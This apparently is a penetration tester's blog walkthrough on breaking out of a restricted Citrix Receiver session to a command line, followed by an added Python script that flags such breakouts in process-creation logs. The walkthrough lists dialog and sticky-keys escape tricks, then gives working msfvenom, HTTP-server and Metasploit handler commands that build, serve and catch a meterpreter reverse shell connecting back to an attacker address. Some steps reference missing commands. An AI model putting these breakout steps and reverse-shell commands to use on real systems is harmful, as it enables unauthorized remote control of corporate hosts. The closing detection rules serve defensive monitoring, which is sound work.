Escaping Citrix Environment
Once you’re in Citrix Receiver you’d like to get a command line. Often domain admins disable access to `cmd` but they forget about
There are different ways to get what you want:
- Use Help (`F1` button) and search for hyperlinks that would open in Internet Explorer.
- Use the “Open file” dialogue, browse to `powershell`, and use the right mouse button to open the file.
- Use Task Manager to run arbitrary programs and applications.
- Use printer dialogues to open Windows Explorer windows.
- Use Internet Explorer Bookmark dialogues to open Windows Explorer windows.
- Put arbitrary paths in web browser address bars.
- You can use sticky keys (press `SHIFT` button 5 times). I used it because I had `cmd` and right button disabled.
Does it still work? Yes, it does!
Then go to the link called “Access Center” and type in a URL field:
Press enter and get your shell:
I had to download `meterpreter` (some say that it’s better to use `Powershell Empire` because it can avoid AVs) so I started a simple HTTP server using
python -m http.server 80
To generate the payload, use
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.128.55 lport=4444 -f exe -o exploit.exe
To know which arch we have on the remote host we can use the following variable:
Create a handler on the attacker’s machine:
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <local ip>
Then we start IE to download our payload:
Invoke-Item "C:\Program Files\Internet Explorer\iexplore.exe"
But it loads only the start page and I was not able to change its behaviour (if you know how, I’d like to know, so email me in that case :). So instead of the previous command I could use the following:
It starts IE and goes to the URL. We download the payload and it gives us a meterpreter shell.
Then we could use the `background` command to send our shell into the background and use some exploits or whatever. To get back to the session use
sessions -i <number>
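The steps above leave a recognizable process trail on the session host. As an added example (not part of the original post), this sketch applies four heuristic rules to Sysmon-style process-creation events; the field names, rule names, host paths and sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumption: events are process-creation records (Sysmon Event ID 1 style)
# from a Citrix session host where users should only run published apps.
SHELLS = {"cmd.exe", "powershell.exe"}
# GUI programs the list above uses as a way out of the published app.
# On a published-app-only host none of them should be starting a shell.
BREAKOUT_PARENTS = {"hh.exe", "iexplore.exe", "taskmgr.exe", "sethc.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata)\\", re.I)
URL = re.compile(r"https?://\S+", re.I)

def classify(event):
    """Return the names of the heuristic rules one event matches."""
    image = basename(event["Image"]).lower()
    parent = basename(event["ParentImage"]).lower()
    hits = []
    if image == "sethc.exe":  # SHIFT pressed five times
        hits.append("sticky-keys-dialog")
    if image in SHELLS and parent in BREAKOUT_PARENTS:
        hits.append("shell-from-gui-helper")
    if image == "iexplore.exe" and parent in SHELLS and URL.search(event["CommandLine"]):
        hits.append("browser-url-from-shell")
    if USER_WRITABLE.search(event["Image"]):  # downloaded binary executed
        hits.append("exe-in-user-writable-path")
    return hits

def triage(events):
    """Map event index -> matched rules, skipping events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
# Constructed sample events; user name, file names and the URL are made up.
SAMPLE = [
    {"Image": r"C:\Windows\System32\sethc.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe", "CommandLine": "sethc.exe 211"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell"},
    {"Image": IE, "ParentImage": PS, "CommandLine": "iexplore.exe http://192.0.2.10/file.exe"},
    {"Image": r"C:\Users\ctxuser\Downloads\file.exe", "ParentImage": IE,
     "CommandLine": "file.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "ParentImage": r"C:\Program Files (x86)\Citrix\System32\wfshell.exe",
     "CommandLine": "WINWORD.EXE"},
]

if __name__ == "__main__":
    for index, rules in triage(SAMPLE).items():
        print(index, basename(SAMPLE[index]["Image"]), rules)
```

The rules are deliberately narrow; on a real host the parent allow-list and path patterns need tuning against the published applications' normal behaviour.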